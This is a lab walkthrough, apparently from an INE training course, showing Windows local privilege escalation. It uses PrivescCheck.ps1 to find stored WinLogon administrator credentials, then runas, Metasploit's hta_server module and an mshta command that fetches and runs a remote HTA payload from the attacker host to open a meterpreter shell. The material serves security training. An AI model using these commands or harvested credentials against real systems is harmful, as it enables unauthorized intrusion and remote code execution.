Windows: PrivescCheck

overview

This lab covers the usage of PrivescCheck.ps1 script to find a common Windows privilege escalation flaw. The PrivescCheck script enumerates common Windows configuration issues that can be leveraged for local privilege escalation. It also gathers various information that might be useful for exploitation and/or post-exploitation.

Task

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine and a target Windows machine. The target machine will be accessible at demo.ine.local.

Your task is to run PrivescCheck.ps1 script to find a common Windows privilege escalation flaw that depends on misconfigurations.

Objective: Gain Administrator user privilege and find the flag.

Tools

The best tools for this lab are:

PrivescCheck.ps1
Metasploit Framework
Powershell

solutions

Step 1: Open the lab link. Switch to the Victim machine.

Content Image

Step 2: Open the powershell.exe terminal to check the current user.

Content Image

We are running as a student user. We will run the PrivescCheck PowerShell script to find possible misconfiguration issues that can be leveraged for local privilege escalation.

Step 3: Switch current folder to PrivescCheck folder.

Commands:

cd C:\Users\student\Desktop\PrivescCheck
ls

Content Image

Step 4: Running PrivescCheck.ps1 script.

Commands:

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

Content Image

The scan has started and it would take 1-2 minutes to finish.

Content Image

We have received the report and we can notice that we found WinLogon credentials. Investigate WinLogon output.

Content Image

We have found an administrator user credential. i.e administrator:hello_123321.

Step 5: We are running a command prompt i.e cmd.exe as an administrator user using discovered credential and runas.exe.

Commands:

runas.exe /user:administrator cmd
hello_123321
whoami

Content Image

We are running cmd.exe as an administrator.

Switch to the Kali Machine

Step 6: Running the hta_server module to gain the meterpreter shell. Start msfconsole.

Commands:

msfconsole -q
use exploit/windows/misc/hta_server
exploit

“This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell.”

Content Image

Copy the generated payload i.e “http://10.10.31.2:8080/Rv4eiCTge85UJ15.hta” and run it on cmd.exe with mshta command to gain the meterpreter shell.

Note: You need to execute the below payload on the cmd.exe.

Switch to Victim Machine

Step 7: Gaining a meterpreter shell.

Commands:

mshta.exe http://10.10.31.2:8080/Rv4eiCTge85UJ15.hta

Note: You need to use your own Metasploit HTA server link.

Content Image

We can expect a meterpreter shell.

Content Image

Step 8: Read the flag.

Commands:

sessions -i 1
cd C:\\Users\\Administrator\\Desktop
dir
cat flag.txt

Content Image

This reveals the flag to us.

Flag: 2b070a650a92129c2462deae7707b0c5

Conclusion

In this lab, we explored the usage of PrivescCheck.ps1 script to find a common Windows privilege escalation flaw and used it to gain a meterpreter session with high privilege.

References

PreviousPriv ESC -Clear-text Password NextUnattended Installation

Last updated 10 months ago